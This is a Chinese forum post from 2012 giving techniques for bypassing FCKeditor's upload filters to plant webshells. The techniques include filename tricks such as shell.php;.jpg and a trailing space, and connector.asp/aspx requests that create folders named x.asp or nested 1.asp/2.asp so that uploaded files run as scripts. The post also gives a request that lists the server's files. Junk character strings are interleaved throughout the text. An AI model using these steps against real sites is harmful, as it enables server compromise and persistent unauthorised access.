很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg. \- r7 `: W# N7 }
; |$ t! L. q$ y: Q7 y; X( T
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
" i* ^. A2 s" A; G3 \
! _( x$ K0 a+ b9 K. v8 X$ p6 L% F继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。9 y8 n8 X2 \& H5 e
+ j9 }# I" w& v9 }. w1 E# A突破建立文件夹:
% k% P p* N9 j9 A) X) Y+ l5 k7 C* o, J. \0 v! |9 E4 I- S) h3 I
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp5 E9 ~3 z0 I1 }2 _. D
, p, N& H) O' s i; l U/ N6 E
参数:- H# A. |$ t' |6 }; ?: d% t
. ~) l7 j& e; m7 V3 ?& H7 w当前目录名:CurrentFolder=/qing.asp9 D1 F/ O, H6 W3 M3 }( I+ u
9 {# K) ~$ Z/ V- P
新的目录名:NewFolderName=x.asp
& |2 E) d, e; B* C3 M6 l: {. I
% e2 e: d+ t, O `4 l; y其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
+ j- P/ b0 Q. [2 F# j8 o, U! U, D! Q7 R
那么 x.asp 就已经建立生成了,此方法百试百灵!
9 N: ]2 N" n1 Y2 K% Q" l9 j2 Z4 x% U, L3 t& ]& |* t
新建文件夹参数 x.asp,基本都能搞定。2 N7 v' N$ n: `) T0 J- \
* b x& `: m" P" s下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
/ ~2 K. K- C. Y; w1 M$ x# I
3 O: P( d) s# P" x zaspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
# e7 @3 y4 l& l- f5 ~( @8 V: K V) m0 [+ w) [% @- q( t' `( W( N% W c
获取文件列表
. X- ^2 S: `+ h aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F# u% {7 r7 Z( Z6 Z: j! V8 L
1 k) v8 G- @! q
|
发表于 2012-12-31 09:27:09
收藏
支持
反对